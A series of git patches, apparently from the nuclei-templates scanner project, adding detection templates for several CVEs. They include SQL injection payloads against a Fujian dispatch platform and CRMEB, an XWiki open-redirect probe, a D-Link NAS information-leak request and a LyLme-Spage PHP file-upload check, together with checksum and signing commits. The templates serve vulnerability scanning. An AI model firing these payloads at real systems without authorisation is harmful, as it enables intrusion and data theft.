+ cve-id: CVE-2024-2621 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台" + tags: cve,cve2024,sqli,fujian,rce + +http: + - raw: + - | + @timeout 10s + GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=5" + - "contains_all(body,'msg','header','code')" + condition: and From fe5294975b6b09e224932b54a015d606f05395f0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 17 Jun 2024 21:25:17 +0530 Subject: [PATCH 0293/1841] Create CVE-2023-32068.yaml --- http/cves/2023/CVE-2023-32068.yaml | 41 ++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-32068.yaml diff --git a/http/cves/2023/CVE-2023-32068.yaml b/http/cves/2023/CVE-2023-32068.yaml new file mode 100644 index 0000000000..e95816405a --- /dev/null +++ b/http/cves/2023/CVE-2023-32068.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-32068 + +info: + name: XWiki - Open Redirect + author: ritikchaddha + severity: medium + description: | + XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0. + impact: | + An attacker can craft malicious URLs to redirect users to malicious websites. + remediation: | + Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities. + reference: + - https://jira.xwiki.org/browse/XWIKI-20096 + - https://nvd.nist.gov/vuln/detail/CVE-2023-32068 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-32068 + cwe-id: CWE-601 + epss-score: 0.00149 + epss-percentile: 0.50372 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: xwiki + product: xwiki + shodan-query: html:"data-xwiki-reference" + fofa-query: body="data-xwiki-reference" + tags: cve,cve2023,xwiki,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' From cec7f4ad0746bbf96ce30b0a9b272d4be06b60a0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 05:32:38 +0000 Subject: [PATCH 0294/1841] Auto Generated New Template Addition List [Tue Jun 18 05:32:38 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f2cb4f47b7..7c4592e856 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ dast/vulnerabilities/sqli/time-based-sqli.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2021/CVE-2021-43831.yaml +http/cves/2023/CVE-2023-32068.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-43472.yaml http/cves/2023/CVE-2023-51449.yaml From fc7f64016a8cd6fe51cdfc802970a831db9f744d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 05:32:50 +0000 Subject: [PATCH 0295/1841] Auto Generated Templates Checksum [Tue Jun 18 05:32:50 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1e8107069e..c535e830b2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3043,6 +3043,7 @@ http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947 http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827 http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019 http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d +http/cves/2023/CVE-2023-32068.yaml:b499872cee4116949f71457b41ca2622f9a76b13 http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb @@ -3309,7 +3310,7 @@ http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 -http/cves/2024/CVE-2024-28995.yaml:68258e16a2266348d3a5e89585095b3de67272bc +http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 @@ -8655,7 +8656,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f168f9cc3aca0892d4ca3a5b350d46eb53981e9d +templates-checksum.txt:843618fffb0f2530b28cefab14fb72d395367345 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 92dbef288b218ffc1ad416be4226f3e00c59289d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 05:33:22 +0000 Subject: [PATCH 0296/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index f0202516e8..6467dcb5c3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2021/CVE-2021-43831.yaml' + - 'http/cves/2023/CVE-2023-32068.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2023/CVE-2023-43472.yaml' - 'http/cves/2023/CVE-2023-51449.yaml' From 008deccfeeaab04e1421324a71b989e79548bc95 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 05:34:30 +0000 Subject: [PATCH 0297/1841] Auto Template Signing [Tue Jun 18 05:34:30 UTC 2024] :robot: --- http/cves/2023/CVE-2023-32068.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-32068.yaml b/http/cves/2023/CVE-2023-32068.yaml index e95816405a..fb09020228 100644 --- a/http/cves/2023/CVE-2023-32068.yaml +++ b/http/cves/2023/CVE-2023-32068.yaml @@ -39,3 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 490a00463044022022611f58439e1b8aa2bf5df976f3774aa14e202e26280efda8267481141f80de022050cc9f2a7c4906ef5bc096ec3ca0ccad1892f139eae285db8a964bd5a5b11f7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 458a5dd9d6776b105dcc89560fd6ed040962e06d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 11:11:12 +0530 Subject: [PATCH 0298/1841] Create CVE-2024-3274.yaml --- http/cves/2024/CVE-2024-3274.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3274.yaml diff --git a/http/cves/2024/CVE-2024-3274.yaml b/http/cves/2024/CVE-2024-3274.yaml new file mode 100644 index 0000000000..d5ee1c23ae --- /dev/null +++ b/http/cves/2024/CVE-2024-3274.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-3274 + +info: + name: D-LINK DNS-320L,DNS-320LW and DNS-327L Information Disclosure via /cgi-bin/info.cgi + author: DhiyaneshDk + severity: medium + description: | + A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler. + reference: + - https://github.com/netsecfish/info_cgi + - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383 + - https://vuldb.com/?ctiid.259285 + - https://vuldb.com/?id.259285 + - https://vuldb.com/?submit.304706 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-3274 + cwe-id: CWE-200 + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + fofa-query: body="Text:In order to access the ShareCenter" + tags: cve,cve2024,dlink,info-leak + +http: + - raw: + - | + GET /cgi-bin/info.cgi HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Model=" + - "Build=" + - "Macaddr=" + condition: and + + - type: status + status: + - 200 From 40343e764413a1086f851092240b634134d3813d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 11:58:35 +0530 Subject: [PATCH 0299/1841] Create CVE-2024-36837.yaml --- http/cves/2024/CVE-2024-36837.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-36837.yaml diff --git a/http/cves/2024/CVE-2024-36837.yaml b/http/cves/2024/CVE-2024-36837.yaml new file mode 100644 index 0000000000..07badea610 --- /dev/null +++ b/http/cves/2024/CVE-2024-36837.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-36837 + +info: + name: CRMEB v.5.2.2 - SQL Injection + author: DhiyaneshDk + severity: high + description: | + SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file. + reference: + - https://github.com/phtcloud-dev/CVE-2024-36837 + - https://nvd.nist.gov/vuln/detail/CVE-2024-36837 + metadata: + verified: true + max-request: 1 + fofa-query: title="CRMEB" + tags: cve,cve2024,crmeb,sqli + +variables: + num: "{{rand_int(9000000, 9999999)}}" + +http: + - raw: + - | + GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550) HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{md5(num)}}" + - "SQLSTATE" + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 From 650cfa96d94c14507f5de6b1e238ae01919ba45e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 12:34:32 +0530 Subject: [PATCH 0300/1841] Create CVE-2024-34982.yaml --- http/cves/2024/CVE-2024-34982.yaml | 71 ++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34982.yaml diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml new file mode 100644 index 0000000000..7ec1c3be5d --- /dev/null +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -0,0 +1,71 @@ +id: CVE-2024-34982 + +info: + name: LyLme-Spage - Arbitary File Upload + author: DhiyaneshDk + severity: high + description: | + An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file. + reference: + - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md + - https://github.com/tanjiti/sec_profile + - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-282504889" + tags: cve,cve2024,lylme-spage,rce,intrusive + +flow: http(1) && http(2) + +variables: + string: "{{randstr}}" + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /include/file.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------575673989461736 + + -----------------------------575673989461736 + Content-Disposition: form-data; name="file"; filename="{{filename}}.php" + Content-Type: image/png + + + -----------------------------575673989461736-- + + matchers-condition: and + matchers: + - type: word + words: + - '"code":' + - '"msg":' + - 'php"}' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: path + part: body + group: 1 + regex: + - '"url":"([/a-z_0-9.]+)"' + internal: true + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{{string}}" )' + - 'contains(header, "text/html")' + condition: and From 29ee82237879df1f2cf2d74c71142f8cb2ab582c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 18 Jun 2024 11:30:15 +0400 Subject: [PATCH 0301/1841] Update google-storage.yaml --- http/technologies/google/google-storage.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/technologies/google/google-storage.yaml b/http/technologies/google/google-storage.yaml index 2c70e5a8c2..f0c1062d76 100644 --- a/http/technologies/google/google-storage.yaml +++ b/http/technologies/google/google-storage.yaml @@ -15,9 +15,10 @@ http: matchers: - type: word - words: - - x-goog-metageneration - - X-Goog-Metageneration part: header + words: + - "x-goog-metageneration" + - "x-goog-generation" + case-insensitive: true # digest: 4a0a00473045022016072ed0dd17077e2035b0d53506ba19f8dc600c375fd55b469870b2b36c2d17022100b6f9dde6d428cffc1cae21932a1a5a81ff87f210e1f8dd572d63255596c082ff:922c64590222798bb761d5b6d8e72950 From 4d4da1a00e96d299e88fa905e63afa176f325f2f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 18 Jun 2024 11:32:11 +0400 Subject: [PATCH 0302/1841] Update aws-object-listing.yaml --- http/misconfiguration/aws/aws-object-listing.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/misconfiguration/aws/aws-object-listing.yaml b/http/misconfiguration/aws/aws-object-listing.yaml index 6fc3fb0c6e..53f253a9aa 100644 --- a/http/misconfiguration/aws/aws-object-listing.yaml +++ b/http/misconfiguration/aws/aws-object-listing.yaml @@ -30,10 +30,18 @@ http: words: - application/xml + - type: word + part: header + words: + - "x-goog-metageneration" + - "x-goog-generation" + case-insensitive: true + negative: true + extractors: - type: regex part: body group: 1 regex: - '([a-z0-9-._]+)' -# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950 From 91ec6cbb107d682ef2b96faae9e0bb72a23ab86e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 07:36:25 +0000 Subject: [PATCH 0304/1841] Auto Generated Templates Checksum [Tue Jun 18 07:36:25 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c535e830b2..712e18d3ae 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3043,7 +3043,7 @@ http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947 http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827 http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019 http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d -http/cves/2023/CVE-2023-32068.yaml:b499872cee4116949f71457b41ca2622f9a76b13 +http/cves/2023/CVE-2023-32068.yaml:41b3c520f9803190b0bff32818680581cbea97fe http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb @@ -5315,7 +5315,7 @@ http/misconfiguration/artifactory-anonymous-deploy.yaml:49628b203377dc7a16449154 http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1 http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea -http/misconfiguration/aws/aws-object-listing.yaml:4b9e4b852563898d23697d06b8a6d057c5ce8dae +http/misconfiguration/aws/aws-object-listing.yaml:7547130ec1870d91ea049acc8a229710d9bae971 http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1 @@ -6837,7 +6837,7 @@ http/technologies/google/cloud-run-default-page.yaml:91ff90b29a400729fd8dbef4aaf http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21 http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d -http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333 +http/technologies/google/google-storage.yaml:3ebb1bd2e850d0237b297fdf196029f9982ef21d http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0 http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 @@ -8656,7 +8656,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:843618fffb0f2530b28cefab14fb72d395367345 +templates-checksum.txt:788bd4d8b8ce6d2736d65be526b4477019f87fde wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3b1a0b775d06e02c5ce624120be8acb3769f64ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 07:38:03 +0000 Subject: [PATCH 0305/1841] Auto Template Signing [Tue Jun 18 07:38:03 UTC 2024] :robot: --- http/misconfiguration/aws/aws-object-listing.yaml | 2 +- http/technologies/google/google-storage.yaml | 3 +-- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/http/misconfiguration/aws/aws-object-listing.yaml b/http/misconfiguration/aws/aws-object-listing.yaml index 53f253a9aa..2f9b0ce688 100644 --- a/http/misconfiguration/aws/aws-object-listing.yaml +++ b/http/misconfiguration/aws/aws-object-listing.yaml @@ -44,4 +44,4 @@ http: group: 1 regex: - '([a-z0-9-._]+)' -# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b4e7ee7ca74a63f236707271d9219e6a4c1e204e12e3e8bb2d3714a64fa9e5a8022068ee95e033478df3256a2323cf1d05917f9d857f58146001422a1b7861ce02a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/google/google-storage.yaml b/http/technologies/google/google-storage.yaml index f0c1062d76..107a8b371f 100644 --- a/http/technologies/google/google-storage.yaml +++ b/http/technologies/google/google-storage.yaml @@ -20,5 +20,4 @@ http: - "x-goog-metageneration" - "x-goog-generation" case-insensitive: true - -# digest: 4a0a00473045022016072ed0dd17077e2035b0d53506ba19f8dc600c375fd55b469870b2b36c2d17022100b6f9dde6d428cffc1cae21932a1a5a81ff87f210e1f8dd572d63255596c082ff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022043c130c84c7c7ff302413d36f39fdd14b34e2ae766c8728f2d7ef891cd125f80022100c51e9928d746128a91e866f8bd77bb46897602cc17ed9d9fbacbfd9de7794e68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 32ea7c886d70eda8db16c00b0b610db34a2f703a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 08:24:11 +0000 Subject: [PATCH 0306/1841] Auto Generated New Template Addition List [Tue Jun 18 08:24:11 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7c4592e856..d8ce733d03 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/exposed-panels/turnkey-lamp-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml http/exposed-panels/wildix-collaboration-panel.yaml http/misconfiguration/apache/apache-server-status-localhost.yaml +http/misconfiguration/cookies-without-secure.yaml http/technologies/nperf-server-detect.yaml http/vulnerabilities/gradio/gradio-ssrf.yaml network/detection/mikrotik-ssh-detect.yaml From ee5b1b6f0662ea2c9e36d50e9ce159728fde7407 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 08:24:19 +0000 Subject: [PATCH 0307/1841] Auto Generated Templates Checksum [Tue Jun 18 08:24:19 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 712e18d3ae..9222a42425 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5315,7 +5315,7 @@ http/misconfiguration/artifactory-anonymous-deploy.yaml:49628b203377dc7a16449154 http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1 http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea -http/misconfiguration/aws/aws-object-listing.yaml:7547130ec1870d91ea049acc8a229710d9bae971 +http/misconfiguration/aws/aws-object-listing.yaml:7c4d6662bbadf6585a95adbbfee865113a08888d http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1 @@ -5344,7 +5344,8 @@ http/misconfiguration/collectd-exporter-metrics.yaml:c47a1526e0297b0f553cbd12b0f http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 -http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 +http/misconfiguration/cookies-without-httponly.yaml:7ef8d2e87d18ddf8d322f344939689ef42c414cc +http/misconfiguration/cookies-without-secure.yaml:5a9d524aa06100448b7d3586c50e62560033d787 http/misconfiguration/corebos-htaccess.yaml:01e578f80bbcf2552413ed4bf039cda8123fb19b http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce @@ -6837,7 +6838,7 @@ http/technologies/google/cloud-run-default-page.yaml:91ff90b29a400729fd8dbef4aaf http/technologies/google/firebase-detect.yaml:fa2021156b4a3de1e257f610042c076d83ecab21 http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827baa9 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d -http/technologies/google/google-storage.yaml:3ebb1bd2e850d0237b297fdf196029f9982ef21d +http/technologies/google/google-storage.yaml:6f4b77b2ce984d502f781974800f1940805db18c http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb http/technologies/gotweb-detect.yaml:9490354702dedc1297a7c0c812954a05efb475d0 http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 @@ -8656,7 +8657,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:788bd4d8b8ce6d2736d65be526b4477019f87fde +templates-checksum.txt:885d565ac15bf0be3a16a5a731b6699bb23f29a7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 50976dc22234e4a1e7ad3ff823293d68e630b8e4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 18 Jun 2024 08:25:03 +0000 Subject: [PATCH 0308/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6467dcb5c3..995321ea53 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/exposed-panels/veeam-backup-manager-login.yaml' - 'http/exposed-panels/wildix-collaboration-panel.yaml' - 'http/misconfiguration/apache/apache-server-status-localhost.yaml' + - 'http/misconfiguration/cookies-without-secure.yaml' - 'http/technologies/nperf-server-detect.yaml' - 'http/vulnerabilities/gradio/gradio-ssrf.yaml' - 'network/detection/mikrotik-ssh-detect.yaml' From 819b40bf1c61a564ba948cbe6c1bd8569d6941f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 18 Jun 2024 08:26:08 +0000 Subject: [PATCH 0309/1841] Auto Template Signing [Tue Jun 18 08:26:08 UTC 2024] :robot: --- http/misconfiguration/cookies-without-httponly.yaml | 1 + http/misconfiguration/cookies-without-secure.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/misconfiguration/cookies-without-httponly.yaml b/http/misconfiguration/cookies-without-httponly.yaml index e0164149ee..22e2b876d3 100644 --- a/http/misconfiguration/cookies-without-httponly.yaml +++ b/http/misconfiguration/cookies-without-httponly.yaml @@ -39,3 +39,4 @@ http: words: - "HttpOnly" negative: true +# digest: 4a0a00473045022100d9b191fde19b5091d9b1ed789721ea3e93689c0b964658df7a578d1e5903ea5802205b26c3af43b5b32a731d2ecd2ef48401ae45a37258168e67710fb2f47abb0989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/cookies-without-secure.yaml b/http/misconfiguration/cookies-without-secure.yaml index 7094dc6928..044c7789e4 100644 --- a/http/misconfiguration/cookies-without-secure.yaml +++ b/http/misconfiguration/cookies-without-secure.yaml @@ -39,3 +39,4 @@ http: words: - "Secure" negative: true +# digest: 4a0a0047304502201f25fc7e9994e80e24096e05ea5deaeae1785bbfa343e9e71203f64f6ab2c22902210080b280e3b3384bb5332aaf450b1c9e541b0e43795a97df1bfe8d050f4742c277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4ae342806e83cb01f4f3099ab96533e601a9a303 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 14:46:38 +0530 Subject: [PATCH 0310/1841] Create CVE-2024-27718.yaml --- 